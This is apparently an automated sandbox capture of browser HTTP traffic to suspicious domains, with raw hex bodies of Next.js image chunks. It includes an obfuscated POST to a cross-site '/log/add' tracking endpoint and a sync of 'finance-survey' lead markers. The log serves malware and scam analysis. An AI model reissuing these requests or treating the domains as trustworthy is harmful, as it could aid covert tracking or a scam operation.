                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:23 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:23 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-180"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1056
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:23 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb416f6d0a43d5-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:23 UTC391INData Raw: 31 38 30 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 33 36 32 33 5d 2c 7b 34 33 36 32 33 3a 66 75 6e 63 74 69 6f 6e 28 41 2c 74 2c 65 29 7b 65 2e 72 28 74 29 2c 74 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 6d 5f 32 30 2e 36 32 62 30 34 37 63 34 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 35 31 32 2c 77 69 64 74 68 3a 35 31 32 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6c 6f 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 45 34 41 41 41 42 51 41 67
                                                                                                          Data Ascii: 180"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[43623],{43623:function(A,t,e){e.r(t),t.default={src:"/_next/static/media/m_20.62b047c4.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRloAAABXRUJQVlA4IE4AAABQAg
                                                                                                          2025-01-06 11:09:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          75192.168.2.450124104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:23 UTC638OUTGET /_next/static/chunks/a61972911ad09d00-1736072686539.d5eb9d66276548f8.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:23 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:23 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-17a"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1056
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:23 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb41702a4680d0-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:23 UTC385INData Raw: 31 37 61 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 39 35 35 5d 2c 7b 31 39 35 35 3a 66 75 6e 63 74 69 6f 6e 28 41 2c 65 2c 74 29 7b 74 2e 72 28 65 29 2c 65 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 6d 5f 32 38 2e 30 39 34 64 64 63 32 30 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 35 31 32 2c 77 69 64 74 68 3a 35 31 32 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6c 67 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 45 77 41 41 41 41 51 41 67 43 64
                                                                                                          Data Ascii: 17a"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1955],{1955:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/m_28.094ddc20.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlgAAABXRUJQVlA4IEwAAAAQAgCd
                                                                                                          2025-01-06 11:09:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          76192.168.2.450122185.49.145.454438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:23 UTC666OUTPOST /log/add?cid=eacf36da-c06d-4d71-90cc-88e30cd4240a&ruid=6ccfebb8-c732-490f-a46c-39244b55a680 HTTP/1.1
                                                                                                          Host: datatechonert.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 2234
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                          Accept: */*
                                                                                                          Origin: https://wungoangeredsa.com
                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:23 UTC2234OUTData Raw: 4c 1b 52 52 1f 1c 26 1c 14 05 67 1f 1c 4b 12 03 01 05 50 0e 4c 5f 03 0e 11 1a 58 16 10 4a 4f 40 79 27 3e 75 24 4a 46 2c 1d 5b 09 01 52 15 13 60 0f 08 12 09 1b 42 09 47 4a 17 51 4a 46 38 05 5d 08 19 64 51 52 52 1f 16 59 2c 10 14 51 0a 1c 19 49 39 1b 09 08 51 1c 02 1e 19 1b 06 02 54 49 58 45 21 08 2d 3c 10 48 46 4e 38 05 5d 08 19 64 51 52 52 1f 16 59 0c 07 0b 4e 0c 0b 10 43 46 4c 19 04 16 54 4f 70 56 5c 51 16 01 59 21 1b 01 16 49 51 7e 0e 05 09 07 17 1d 4c 41 15 4b 43 46 58 5e 48 5b 59 40 4c 13 16 1b 5b 59 5e 5b 5e 16 19 1a 15 03 02 06 4f 54 55 4a 02 0a 1a 53 40 0f 55 46 4c 1c 1b 43 4c 57 06 09 00 02 56 46 0e 01 1d 40 02 51 4e 09 4d 48 19 13 50 0e 5f 5d 1b 1b 44 4f 58 5e 48 58 59 40 51 11 5b 03 51 46 4c 1c 14 57 4c 57 07 15 11 45 1b 0c 5b 52 4c 5a 0c 45 5b
                                                                                                          Data Ascii: LRR&gKPL_XJO@y'>u$JF,[R`BGJQJF8]dQRRY,QI9QTIXE!-<HFN8]dQRRYNCFLTOpV\QY!IQ~LAKCFX^H[Y@L[Y^[^OTUJS@UFLCLWVF@QNMHP_]DOX^HXY@Q[QFLWLWE[RLZE[
                                                                                                          2025-01-06 11:09:24 UTC470INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.25.5
                                                                                                          Date: Mon, 06 Jan 2025 11:09:23 GMT
                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                          Content-Length: 12
                                                                                                          Connection: close
                                                                                                          Access-Control-Allow-Origin: https://wungoangeredsa.com
                                                                                                          Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                                          Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization, X-Forwarded-For, If-None-Match
                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                          2025-01-06 11:09:24 UTC12INData Raw: 7b 22 73 74 61 74 75 73 22 3a 32 7d
                                                                                                          Data Ascii: {"status":2}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          77192.168.2.450125104.18.3.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:24 UTC599OUTPOST /sync-do HTTP/1.1
                                                                                                          Host: forspearowor.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 241
                                                                                                          Cache-Control: max-age=0
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Content-Type: application/json
                                                                                                          Accept: */*
                                                                                                          Origin: https://wungoangeredsa.com
                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:24 UTC241OUTData Raw: 5b 7b 22 6e 61 6d 65 22 3a 22 6c 65 61 64 2d 63 72 6f 73 73 22 2c 22 63 68 65 63 6b 22 3a 74 72 75 65 2c 22 70 72 65 66 69 78 22 3a 22 66 69 6e 61 6e 63 65 2d 73 75 72 76 65 79 22 2c 22 64 65 66 61 75 6c 74 54 74 6c 22 3a 36 30 34 38 30 30 7d 2c 7b 22 6e 61 6d 65 22 3a 22 6c 65 61 64 2d 74 65 65 6e 61 67 65 2d 63 72 6f 73 73 22 2c 22 63 68 65 63 6b 22 3a 74 72 75 65 2c 22 70 72 65 66 69 78 22 3a 22 66 69 6e 61 6e 63 65 2d 73 75 72 76 65 79 22 2c 22 64 65 66 61 75 6c 74 54 74 6c 22 3a 36 30 34 38 30 30 7d 2c 7b 22 6e 61 6d 65 22 3a 22 76 69 65 77 2d 63 6f 75 6e 74 22 2c 22 63 68 65 63 6b 22 3a 74 72 75 65 2c 22 70 72 65 66 69 78 22 3a 22 32 37 32 22 2c 22 64 65 66 61 75 6c 74 54 74 6c 22 3a 36 30 34 38 30 30 7d 5d
                                                                                                          Data Ascii: [{"name":"lead-cross","check":true,"prefix":"finance-survey","defaultTtl":604800},{"name":"lead-teenage-cross","check":true,"prefix":"finance-survey","defaultTtl":604800},{"name":"view-count","check":true,"prefix":"272","defaultTtl":604800}]
                                                                                                          2025-01-06 11:09:24 UTC955INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:24 GMT
                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Vary: Accept-Encoding
                                                                                                          X-Trace-Id: 80de9b1b643c40e1256a75397fcaba3f
                                                                                                          Accept-Ch: Sec-CH-UA, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model
                                                                                                          Access-Control-Allow-Origin: https://wungoangeredsa.com
                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding, baggage, sentry-trace
                                                                                                          Pragma: no-cache
                                                                                                          Cache-Control: no-transform, no-store, no-cache, must-revalidate, max-age=0
                                                                                                          Expires: Tue, 11 Jan 1994 10:00:00 GMT
                                                                                                          Timing-Allow-Origin: *
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb41723c308c78-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:24 UTC275INData Raw: 31 30 63 0d 0a 5b 7b 22 6e 61 6d 65 22 3a 22 6c 65 61 64 2d 63 72 6f 73 73 22 2c 22 70 72 65 66 69 78 22 3a 22 66 69 6e 61 6e 63 65 2d 73 75 72 76 65 79 22 2c 22 65 78 69 73 74 22 3a 66 61 6c 73 65 2c 22 76 61 6c 75 65 22 3a 22 22 2c 22 72 65 6d 61 69 6e 69 6e 67 54 74 6c 22 3a 30 7d 2c 7b 22 6e 61 6d 65 22 3a 22 6c 65 61 64 2d 74 65 65 6e 61 67 65 2d 63 72 6f 73 73 22 2c 22 70 72 65 66 69 78 22 3a 22 66 69 6e 61 6e 63 65 2d 73 75 72 76 65 79 22 2c 22 65 78 69 73 74 22 3a 66 61 6c 73 65 2c 22 76 61 6c 75 65 22 3a 22 22 2c 22 72 65 6d 61 69 6e 69 6e 67 54 74 6c 22 3a 30 7d 2c 7b 22 6e 61 6d 65 22 3a 22 76 69 65 77 2d 63 6f 75 6e 74 22 2c 22 70 72 65 66 69 78 22 3a 22 32 37 32 22 2c 22 65 78 69 73 74 22 3a 66 61 6c 73 65 2c 22 76 61 6c 75 65 22 3a 22 22 2c
                                                                                                          Data Ascii: 10c[{"name":"lead-cross","prefix":"finance-survey","exist":false,"value":"","remainingTtl":0},{"name":"lead-teenage-cross","prefix":"finance-survey","exist":false,"value":"","remainingTtl":0},{"name":"view-count","prefix":"272","exist":false,"value":"",
                                                                                                          2025-01-06 11:09:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          78192.168.2.450127104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:24 UTC638OUTGET /_next/static/chunks/ffa1a9ad1af72fff-1736072686539.a773b898c1059c87.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:24 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:24 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-184"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1319
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:24 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb417289074375-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:24 UTC395INData Raw: 31 38 34 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 37 35 32 30 5d 2c 7b 33 37 35 32 30 3a 66 75 6e 63 74 69 6f 6e 28 41 2c 65 2c 74 29 7b 74 2e 72 28 65 29 2c 65 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 6d 5f 31 33 2e 39 39 64 31 30 35 63 30 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 35 31 32 2c 77 69 64 74 68 3a 35 31 32 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6c 77 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 46 41 41 41 41 43 77 41 51
                                                                                                          Data Ascii: 184"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[37520],{37520:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/m_13.99d105c0.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlwAAABXRUJQVlA4IFAAAACwAQ
                                                                                                          2025-01-06 11:09:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          79192.168.2.450126104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:24 UTC638OUTGET /_next/static/chunks/778e9b206de35143-1736072686539.bfe7610401739abb.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:24 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:24 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-17c"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1057
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:24 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4172c8194361-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:24 UTC387INData Raw: 31 37 63 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 31 31 38 32 5d 2c 7b 32 31 31 38 32 3a 66 75 6e 63 74 69 6f 6e 28 41 2c 65 2c 74 29 7b 74 2e 72 28 65 29 2c 65 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 6d 5f 32 37 2e 33 34 65 36 33 35 37 36 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 35 31 32 2c 77 69 64 74 68 3a 35 31 32 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6c 59 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 45 6f 41 41 41 43 77 41 51
                                                                                                          Data Ascii: 17c"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[21182],{21182:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/m_27.34e63576.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlYAAABXRUJQVlA4IEoAAACwAQ
                                                                                                          2025-01-06 11:09:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          80192.168.2.450129104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:24 UTC638OUTGET /_next/static/chunks/b79dd0dbaf68b5b4-1736072686539.3b548827f7eb8d6d.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:24 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:24 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-180"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1057
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:24 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4172c9f2c461-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:24 UTC391INData Raw: 31 38 30 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 38 34 34 30 5d 2c 7b 35 38 34 34 30 3a 66 75 6e 63 74 69 6f 6e 28 41 2c 74 2c 65 29 7b 65 2e 72 28 74 29 2c 74 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 66 5f 31 34 2e 33 66 39 63 64 65 36 66 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 35 31 32 2c 77 69 64 74 68 3a 35 31 32 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6c 6f 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 45 34 41 41 41 44 77 41 51
                                                                                                          Data Ascii: 180"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[58440],{58440:function(A,t,e){e.r(t),t.default={src:"/_next/static/media/f_14.3f9cde6f.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRloAAABXRUJQVlA4IE4AAADwAQ
                                                                                                          2025-01-06 11:09:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          81192.168.2.450128104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:24 UTC638OUTGET /_next/static/chunks/edad189aa37887a4-1736072686539.43e4db17fc3b4987.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:24 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:24 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-180"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1319
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:24 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4172caddefa5-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
